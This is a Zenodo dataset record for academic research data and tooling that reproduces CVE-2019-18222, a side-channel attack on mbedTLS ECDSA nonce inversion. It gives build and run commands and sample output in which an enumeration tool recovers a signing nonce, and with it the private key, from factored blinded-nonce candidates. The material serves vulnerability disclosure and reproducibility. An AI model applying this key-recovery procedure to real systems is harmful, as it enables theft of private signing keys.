Dataset Open Access

CVE-2019-18222: research data and tooling

Alejandro Cabrera Aldaya; Billy Bob Brumley


Dublin Core Export

<?xml version='1.0' encoding='utf-8'?>
<oai_dc:dc xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/ http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
  <dc:creator>Alejandro Cabrera Aldaya</dc:creator>
  <dc:creator>Billy Bob Brumley</dc:creator>
  <dc:date>2020-01-13</dc:date>
  <dc:description>This dataset and software tool are for reproducing the research results related to CVE-2019-18222.

Description


	enum contains the key enumeration tool.
	kt_candidates contains the JSON for blinded nonce candidates, indexed by trial number. JSON fields:



	kt_candidates: list of nonce candidates.



	sig_data contains the JSON for ECDSA signatures, index by trial number. JSON fields:



	p: the prime the curve is defined over. (P-256 here.)
	Gx, Gy: Generator coordinates.
	d: Ground truth ECDSA long term key.
	Px, Py: Public key coordinates.
	h: SHA-256 digest to sign, encoded to the finite field.
	k: Ground truth ECDSA nonce.
	r, s: ECDSA signature.


Build

cd enum
make clean
make

Run

Start with enum as the working directory.

cd enum

Pull out a kt candidate, in this example index 847.

$ jq '.kt_candidates' ../kt_candidates/kt_candidates_847.json
[
  "0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0"
]

Factor that candidate.

$ time sage -c "print ecm.factor(0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0)"
[2, 2, 2, 2, 2, 3, 353, 193243, 1540830719, 9263081209, 103633959617085683, 151389566295160172521, 283135469779419532841, 572987990320782777757565685333349772719941819448953457732874126833]

real    0m5.837s
user    0m5.648s
sys 0m0.214s

Now pull out the r component of the ECDSA signature for that index, and convert it from hex to base 10.

$ jq '.r' ../sig_data/sig_data_847.json
"0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
$ python -c "print 0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"
22111746808803128586382711090186612204136854333384650261207856620766542674791

Now run the enum tool to recover the nonce.

$ ./enum 
Usage: ./enum &lt;jobs_num&gt; &lt;jobs_id&gt; &lt;target_base_10&gt; space delimited flat list of factors in base ten

The &lt;jobs_num&gt; and &lt;jobs_id&gt; arguments are to ease parallel execution; read the source code. But for a single core, pass them as 1 0.

$ ./enum 1 0 22111746808803128586382711090186612204136854333384650261207856620766542674791 2 2 2 2 2 3 353 193243 1540830719 9263081209 103633959617085683 151389566295160172521 2831354697794195
32841 572987990320782777757565685333349772719941819448953457732874126833
INFO:target:30E2CE20A8140177A31A66763D85F431ACC9790DD050FFC22ED5D454CDFBBB67
INFO:found:31A52C4960857E6D2F7AD82BAC7D55CE6CC9AD13B959F069002B6A949EA6A048
INFO:tests:7879

where 221..791 is the base-10 r component of the ECDSA signature, and 2 2 .. 572..833 is the full list of blinded nonce factors. In the output:


	INFO:target:&lt;hex&gt; is the hex form of base-10 target input (ECDSA r component).
	INFO:found:&lt;hex&gt; is the hex form of the recovered ECDSA nonce.
	INFO:tests:&lt;num&gt; is the number of tested nonce candidates (scalar multiplications).


We can see this successfully recovered the nonce (hence long term ECDSA private key) correctly:

$ jq '.k' ../sig_data/sig_data_847.json
"0x31a52c4960857e6d2f7ad82bac7d55ce6cc9ad13b959f069002b6a949ea6a048"</dc:description>
  <dc:identifier>https://zenodo.org/record/3605805</dc:identifier>
  <dc:identifier>10.5281/zenodo.3605805</dc:identifier>
  <dc:identifier>oai:zenodo.org:3605805</dc:identifier>
  <dc:language>eng</dc:language>
  <dc:relation>info:eu-repo/grantAgreement/EC/H2020/804476/</dc:relation>
  <dc:relation>url:https://eprint.iacr.org/2020/055</dc:relation>
  <dc:relation>doi:10.5281/zenodo.3605804</dc:relation>
  <dc:rights>info:eu-repo/semantics/openAccess</dc:rights>
  <dc:rights>https://opensource.org/licenses/MIT</dc:rights>
  <dc:subject>side-channel analysis</dc:subject>
  <dc:subject>ECDSA</dc:subject>
  <dc:subject>binary GCD</dc:subject>
  <dc:subject>modular inversion</dc:subject>
  <dc:subject>Intel SGX</dc:subject>
  <dc:subject>mbedTLS</dc:subject>
  <dc:title>CVE-2019-18222: research data and tooling</dc:title>
  <dc:type>info:eu-repo/semantics/other</dc:type>
  <dc:type>dataset</dc:type>
</oai_dc:dc>
186
14
views
downloads
All versions This version
Views 186186
Downloads 1414
Data volume 18.1 MB18.1 MB
Unique views 164164
Unique downloads 1313

Share

Cite as